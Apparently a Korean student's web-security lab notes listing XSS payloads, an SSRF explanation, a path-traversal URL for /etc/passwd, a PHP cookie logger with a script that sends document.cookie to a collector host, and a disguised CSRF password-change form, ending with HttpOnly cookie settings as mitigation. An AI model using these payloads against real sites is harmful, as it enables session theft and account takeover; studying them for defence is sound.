<script> location.href="[https://www.naver.com](https://www.naver.com/)"</script>
<a href = "http://www.naver.com"> click here </a>
<a href ="http://www.naver.com"><img src="주소" width="100" height="100"></img></a>
<iframe src="https://www.nate.com" width="800" height="800" frameborder="10"></iframe>
<iframe width="560" height="315" src="영상링크";>
<script> alert("안녕하세요")</script>
<script> alert("안녕하세요")</script>
<script> location.href="[https://www.naver.com](https://www.naver.com/)"</script>
<script> alert(document.cookie)</script>
- ssrf
https://www.lgcns.com/blog/cns-tech/security/3202/
- 취약한 서버를 이용하여 공격자가 내부 서버에 원하는 요청을 보내도록 하는 방법
- 보통 공격자가 과도한 정보나 기능을 요청할 경우, 방화벽에서 필터링하거나 웹 서버에서 원하는 정보를 보내주지 않습니다. 하지만 인터넷 앞단의 웹서버가 입력된 URL 값을 충분하게 검사하지 않고 내부 서버로 전달한다면 이야기가 달라집니다. 이것을 이용해서 내부 서버의 정보를 노출시키거나 서비스 거부 공격할 수 있는 것입니다. 이처럼 SSRF는 웹페이지 번역 서비스, PDF 문서 생성기의 잘못된 구현이나, 퍼블릭 클라우드 환경에서 메타서버 접근통제가 미흡한 경우 발생할 수 있습니다.
- SSRF는 ‘CSRF(Cross Site Request Forgery)’와 비슷한 이름을 가지고 있습니다. 이 두 공격은 비슷한 방식을 사용하지만 이용하는 매개체가 다릅니다. 원하는 정보를 얻을 때 SSRF가 서버의 요청을 이용한다면, CSRF는 사용자의 요청을 이용하는 것이죠. 두 공격 모두 공격자가 접근할 수 없는 정보나 시스템에 접근할 수 있도록 만들어줍니다. 하지만 공통적으로 내부에서는 ‘정상 요청’이라고 인식하게 됩니다.
- 해당 링크 주소를 변경하여 내부의 자원을 서버가 직접 출력하도록 만듬, 자원을 끌어옴
- 로컬 호스트를 사용할 수도 있음(직접 들어가서 가져오는 것도 가능)
`http://192.168.10.10/down_file.php?file_name=../../../../../../../etc/passwd`
<?php
$fd=fopen("/sevas/cookie.dat","a+") or die ("can't open file");
fputs($fd,$_SERVER['REMOTE_ADDR']."Cookie is {$_GET["cookie"]} \n" );
fclose($fd);
?>
<img name="i" width="0" height="0"> </img> <script> i.src="http://192.168.10.20/getcookie.php?cookie="+document.cookie</script>
<img name="i" width="0" height="0" src="http://192.168.10.200/getcookie.php?cookie=PHPSESSID=si3i13dbbucosb3oprqmd1f9f1">
http://192.168.10.10/board_view.php?b_no='><img src=x onerror=prompt(5)>
http://192.168.10.10/board_view.php?b_no=%27)><script>alert(%27sevas%27)</script>
http://192.168.10.10/board_view.php?b_no=%27><script>alert(document.cookie)</script>
xss CSRF 공격수행 클라이언트 서버 기능구현 공격자 script 서버 제공 기능 script사용여부 필수 선택 공격시 준비 취약점 발견시 즉시 사용 동작 원리/request/response의 로직 분석 공격감지 가능 감지 가능 구분이 어려움
이벤트 당첨 확인바랍니다<br>
<form method=POST action=proc/update_proc.php>
<input type=hidden name=pw value=1>
<input type=submit value="휴가갈사람">
</form>
<?xml version="1.0" encoding="UTF-8">
<Context path="/[webapp 경로]" useHttpOnly="true">
session.cookie_httponly = True
Cookie cookie = getMyCookie("myCookieName");
// /etc/php/{version}/php.ini 파일 수정
cookie.setHttpOnly(true);